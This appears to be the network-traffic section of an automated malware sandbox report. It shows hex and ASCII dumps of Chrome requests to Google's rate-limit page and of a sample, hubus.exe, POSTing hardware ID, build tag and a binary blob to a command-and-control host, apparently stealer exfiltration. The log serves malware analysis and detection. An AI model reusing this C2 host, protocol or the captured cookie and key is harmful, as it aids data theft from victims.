                                                                                                                                                                                                                                                            2024-12-19 23:58:29 UTC1255INData Raw: 73 20 62 6c 6f 63 6b 65 64 20 64 75 65 20 74 6f 20 75 6e 61 64 64 72 65 73 73 65 64 20 61 62 75 73 65 20 63 6f 6d 70 6c 61 69 6e 74 73 20 61 62 6f 75 74 20 6d 61 6c 69 63 69 6f 75 73 20 62 65 68 61 76 69 6f 72 2e 20 54 68 69 73 20 70 61 67 65 20 63 68 65 63 6b 73 20 74 6f 20 73 65 65 20 69 66 20 69 74 27 73 20 72 65 61 6c 6c 79 20 61 20 68 75 6d 61 6e 20 73 65 6e 64 69 6e 67 20 74 68 65 20 72 65 71 75 65 73 74 73 20 61 6e 64 20 6e 6f 74 20 61 20 72 6f 62 6f 74 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 74 68 69 73 20 6e 65 74 77 6f 72 6b 2e 20 3c 62 72 3e 3c 62 72 3e 0a 3c 64 69 76 20 69 64 3d 22 69 6e 66 6f 44 69 76 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 20 70 61
                                                                                                                                                                                                                                                            Data Ascii: s blocked due to unaddressed abuse complaints about malicious behavior. This page checks to see if it's really a human sending the requests and not a robot coming from this network. <br><br><div id="infoDiv" style="display:none; background-color:#eee; pa
                                                                                                                                                                                                                                                            2024-12-19 23:58:29 UTC192INData Raw: 6c 69 65 6e 74 3d 63 68 72 6f 6d 65 2d 6f 6d 6e 69 26 61 6d 70 3b 67 73 5f 72 69 3d 63 68 72 6f 6d 65 2d 65 78 74 2d 61 6e 73 67 26 61 6d 70 3b 78 73 73 69 3d 74 26 61 6d 70 3b 71 3d 26 61 6d 70 3b 6f 69 74 3d 30 26 61 6d 70 3b 6f 66 74 3d 31 26 61 6d 70 3b 70 67 63 6c 3d 32 30 26 61 6d 70 3b 67 73 5f 72 6e 3d 34 32 26 61 6d 70 3b 73 75 67 6b 65 79 3d 41 49 7a 61 53 79 42 4f 74 69 34 6d 4d 2d 36 78 39 57 44 6e 5a 49 6a 49 65 79 45 55 32 31 4f 70 42 58 71 57 42 67 77 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: lient=chrome-omni&amp;gs_ri=chrome-ext-ansg&amp;xssi=t&amp;q=&amp;oit=0&amp;oft=1&amp;pgcl=20&amp;gs_rn=42&amp;sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw<br></div></div></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            6192.168.11.2049753172.253.124.1044436932C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-19 23:58:29 UTC901OUTGET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRmgZjNGKXmkrsGIjBi_vnjRSamj0Ps8W_DTyzCERXw8ffcqRqOodjIwUl9-vkLiJC2hrtFdECb_cWTDBsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            X-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIlKHLAQic/swBCIWgzQEIrJ7OAQjkr84BCMO2zgEIvbnOAQjtvM4BCLu9zgEI1r3OAQjMv84BGMHLzAEYva7OARidsc4B
                                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                            Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
                                                                                                                                                                                                                                                            2024-12-19 23:58:30 UTC356INHTTP/1.1 429 Too Many Requests
                                                                                                                                                                                                                                                            Date: Thu, 19 Dec 2024 23:58:30 GMT
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Server: HTTP server (unknown)
                                                                                                                                                                                                                                                            Content-Length: 3208
                                                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            2024-12-19 23:58:30 UTC899INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 3f 68 6c 3d 65 6e 2d 55 53 26 61 6d 70 3b 61 73 79
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_ogb?hl=en-US&amp;asy
                                                                                                                                                                                                                                                            2024-12-19 23:58:30 UTC1255INData Raw: 0a 3c 73 63 72 69 70 74 3e 76 61 72 20 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 74 62 66 6c 33 65 74 6a 34
                                                                                                                                                                                                                                                            Data Ascii: <script>var submitCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="tbfl3etj4
                                                                                                                                                                                                                                                            2024-12-19 23:58:30 UTC1054INData Raw: 30 70 78 3b 20 6d 61 72 67 69 6e 3a 30 20 30 20 31 35 70 78 20 30 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 22 3e 0a 54 68 69 73 20 70 61 67 65 20 61 70 70 65 61 72 73 20 77 68 65 6e 20 47 6f 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77
                                                                                                                                                                                                                                                            Data Ascii: 0px; margin:0 0 15px 0; line-height:1.4em;">This page appears when Google automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block w


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            7192.168.11.2049754172.253.124.1044436932C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-19 23:58:30 UTC727OUTGET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjNGKXmkrsGIjCkGpzj8-euKlDOVcJu_WqTG7Pj74bgPdYXXG0950A2yNMi702qgLvpvTQOXXmXdkwyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                            Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
                                                                                                                                                                                                                                                            2024-12-19 23:58:30 UTC356INHTTP/1.1 429 Too Many Requests
                                                                                                                                                                                                                                                            Date: Thu, 19 Dec 2024 23:58:30 GMT
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Server: HTTP server (unknown)
                                                                                                                                                                                                                                                            Content-Length: 3136
                                                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            2024-12-19 23:58:30 UTC899INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_promos</title></head
                                                                                                                                                                                                                                                            2024-12-19 23:58:30 UTC1255INData Raw: 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 6e 67 55 32 32 77 69 31 4f 48 33 74 47 44 5f 37 45 75 55 54 59 50 4b 58 49 79 6d 75 5f 6f 33 72 54
                                                                                                                                                                                                                                                            Data Ascii: ack = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="ngU22wi1OH3tGD_7EuUTYPKXIymu_o3rT
                                                                                                                                                                                                                                                            2024-12-19 23:58:30 UTC982INData Raw: 73 20 70 61 67 65 20 61 70 70 65 61 72 73 20 77 68 65 6e 20 47 6f 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 65 72 20 74 68 6f 73 65 20 72 65 71 75 65 73 74 73 20 73 74 6f 70 2e 20 20 49
                                                                                                                                                                                                                                                            Data Ascii: s page appears when Google automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly after those requests stop. I


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            8192.168.11.2049760104.21.112.14434780C:\Users\user\Desktop\hubus.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-19 23:58:34 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=VAOSTAXSSS8E17D
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 698
                                                                                                                                                                                                                                                            Host: testyhurriedo.click
                                                                                                                                                                                                                                                            2024-12-19 23:58:34 UTC698OUTData Raw: 2d 2d 56 41 4f 53 54 41 58 53 53 53 38 45 31 37 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 34 33 33 31 41 38 42 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 0d 0a 2d 2d 56 41 4f 53 54 41 58 53 53 53 38 45 31 37 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 56 41 4f 53 54 41 58 53 53 53 38 45 31 37 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 53 48 45 4c 4c 53 0d 0a 2d 2d 56 41 4f 53
                                                                                                                                                                                                                                                            Data Ascii: --VAOSTAXSSS8E17DContent-Disposition: form-data; name="hwid"A4331A8BB129FD4CDB71E32F12885CB3--VAOSTAXSSS8E17DContent-Disposition: form-data; name="pid"1--VAOSTAXSSS8E17DContent-Disposition: form-data; name="lid"jMw1IE--SHELLS--VAOS
                                                                                                                                                                                                                                                            2024-12-19 23:58:34 UTC1134INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Thu, 19 Dec 2024 23:58:34 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=fqe59ng267dp3aobnfklpnn9u2; expires=Mon, 14 Apr 2025 17:45:13 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mUIwvoi8q2ShSGIaFNiXICdr1k7ufUp9GXH70JpcTNHXUpK1Bx%2F3W2UgnhEs7tDMdU85%2F3Jsp1QhGodk%2Bl%2Ft1MuA0vztcwSNhn9kJ84iGXNEKzZniDnTerAaXT6YgU5rqg%2BXoT1g"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f4b57686a1932ef-JAX
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=135524&min_rtt=135380&rtt_var=28638&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=1614&delivery_rate=28268&cwnd=252&unsent_bytes=0&cid=7024e91334d5dc6c&ts=721&x=0"
                                                                                                                                                                                                                                                            2024-12-19 23:58:34 UTC24INData Raw: 31 32 0d 0a 6f 6b 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 30 35 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 12ok 102.129.152.205
                                                                                                                                                                                                                                                            2024-12-19 23:58:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            9192.168.11.2049761104.21.112.14434780C:\Users\user\Desktop\hubus.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-19 23:58:35 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=QQV4MUKP
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 20785
                                                                                                                                                                                                                                                            Host: testyhurriedo.click
                                                                                                                                                                                                                                                            2024-12-19 23:58:35 UTC15331OUTData Raw: 2d 2d 51 51 56 34 4d 55 4b 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 34 33 33 31 41 38 42 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 0d 0a 2d 2d 51 51 56 34 4d 55 4b 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 51 51 56 34 4d 55 4b 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 53 48 45 4c 4c 53 0d 0a 2d 2d 51 51 56 34 4d 55 4b 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69
                                                                                                                                                                                                                                                            Data Ascii: --QQV4MUKPContent-Disposition: form-data; name="hwid"A4331A8BB129FD4CDB71E32F12885CB3--QQV4MUKPContent-Disposition: form-data; name="pid"2--QQV4MUKPContent-Disposition: form-data; name="lid"jMw1IE--SHELLS--QQV4MUKPContent-Disposi
                                                                                                                                                                                                                                                            2024-12-19 23:58:35 UTC5454OUTData Raw: ed c4 56 d7 d8 75 7b 47 d2 68 31 1f f5 ce c4 26 80 58 00 9f 02 e2 d7 5d ef da 68 c4 65 f3 02 1a 5d e3 17 54 a9 ba eb 91 5a 95 6d a3 b1 48 ab ef e3 44 b6 cc 50 39 d2 80 18 d8 28 05 de d2 29 a7 23 a3 fd 62 e0 d2 60 f3 9c de 50 85 b6 cd a9 74 4c d8 cc 07 59 7e 6f 0c f9 6f 38 01 50 1f e0 d4 37 c7 23 5d 66 24 ce ee e1 f7 f9 c0 8d 8f a2 96 74 b9 a0 9b bc 33 c5 0f 18 ae 1a d3 37 38 e4 b5 bb 46 d8 95 3d 17 6f 0d a8 d5 98 dd 3e c6 65 f9 ed 6c 0e 6b 59 60 ab 33 1a 26 4e 75 6d ba d1 05 38 57 6f f9 d9 68 fa 51 96 5e b3 35 47 37 a9 e3 b0 8e 66 f6 1c 65 f9 69 8c b3 d9 1e 97 75 47 2b b9 79 5a f4 06 d5 35 56 b0 1a 03 eb 65 b2 76 8e 96 58 2b 9d d3 0a e3 aa 65 b3 6e 84 d7 68 9f d0 72 c9 78 92 f5 e5 d9 68 37 aa 14 e2 6c c6 33 a3 c8 19 d6 fb 93 15 36 ff a0 64 53 05 9a ce 24
                                                                                                                                                                                                                                                            Data Ascii: Vu{Gh1&X]he]TZmHDP9()#b`PtLY~oo8P7#]f$t378F=o>elkY`3&Num8WohQ^5G7feiuG+yZ5VevX+enhrxh7l36dS$
                                                                                                                                                                                                                                                            2024-12-19 23:58:36 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Thu, 19 Dec 2024 23:58:35 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=bcd5m49a4jhbg8pl57v96bh5e7; expires=Mon, 14 Apr 2025 17:45:14 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A6MLKwto3NUJ7W5piMvGx3QNxHE6gFPR4dRrieiM91K47L3hgK85GjTPRgskcqwIXR9j90gwyBZRfp4adnNYVFvEGkO%2F3digVfdjnMXmAdFL0nEjLBBBDgjwU%2BDhoqRf9EkvuTmh"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f4b576e596b32ef-JAX
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=135088&min_rtt=134951&rtt_var=28676&sent=17&recv=24&lost=0&retrans=0&sent_bytes=2847&recv_bytes=21740&delivery_rate=28297&cwnd=252&unsent_bytes=0&cid=7a33d2be4444e3bb&ts=874&x=0"
                                                                                                                                                                                                                                                            2024-12-19 23:58:36 UTC24INData Raw: 31 32 0d 0a 6f 6b 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 30 35 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 12ok 102.129.152.205
                                                                                                                                                                                                                                                            2024-12-19 23:58:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            10192.168.11.2049762104.21.112.14434780C:\Users\user\Desktop\hubus.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-19 23:58:36 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=276ZBBOBB0UYY
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 10909
                                                                                                                                                                                                                                                            Host: testyhurriedo.click
